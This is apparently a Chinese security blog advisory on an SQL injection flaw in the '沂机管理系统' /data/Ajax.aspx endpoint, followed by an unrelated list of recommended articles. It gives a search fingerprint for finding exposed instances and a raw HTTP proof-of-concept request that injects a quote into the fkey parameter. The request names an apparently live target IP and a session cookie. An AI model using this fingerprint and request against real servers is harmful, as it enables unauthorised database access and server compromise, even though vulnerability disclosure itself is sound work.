沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞

马船长2024-10-02 14:25

漏洞描述

沂机管理系统/data/Ajax.aspx接口存在SQL注入漏洞,攻击者可以获取服务器权限

漏洞复现

复制代码 
body="后台管理系统演示版"

POC

复制代码 
GET /data/Ajax.aspx?method=log_list&page=1&limit=20&fkey=1'&fdate1=2024-10-01+00%3A00%3A00&fdate2=2024-10-01+23%3A59%3A59 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Referer: http://221.2.93.215:8091/basedata/log_list.aspx?ModuleID=104&navtabid=a102&reporttitle=60xZrkSLVc4i9GTkoGayYA==&fwidth=600&fheight=355
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=d2dkwvksddxsvejtgqmh3oe3; pfbs_Login_compid=1001
Connection: keep-alive

bp 报错泄露绝对路径

sqlmap确认有漏洞

相关推荐
谢尔登18 分钟前
从源码视角来看Pinia!
前端·javascript·vue.js
运筹vivo@42 分钟前
攻防世界: mfw
前端·web安全·php
沛沛老爹1 小时前
从Web到AI:行业专属Agent Skills生态系统技术演进实战
java·开发语言·前端·vue.js·人工智能·rag·企业转型
GGGG寄了2 小时前
HTML——列表标签
前端·html5
HWL56792 小时前
显示器缩放和更改分辨率的区别
前端·css·vue.js·计算机外设·html5
jzshmyt2 小时前
曼德勃罗集web可视化应用
前端
GGGG寄了2 小时前
HTML——表格的基本用法
前端·html
yanyu-yaya2 小时前
速学兼复习之vue3章节3
前端·javascript·vue.js·学习·前端框架
web小白成长日记3 小时前
前端向架构突围系列模块化 [4 - 1]:思想-超越文件拆分的边界思维
前端·架构
热门推荐
01GitHub 镜像站点02OpenCode 入门教程:介绍 · 安装 · 配置第三方 API (如 Claude)03Claude Code Skills 实用使用手册04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05UV安装并设置国内源06AI 规范驱动开发“三剑客”深度对比:Spec-Kit、Kiro 与 OpenSpec 实战指南07安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)08BongoCat - 跨平台键盘猫动画工具09Linux下V2Ray安装配置指南10Labelme从安装到标注:零基础完整指南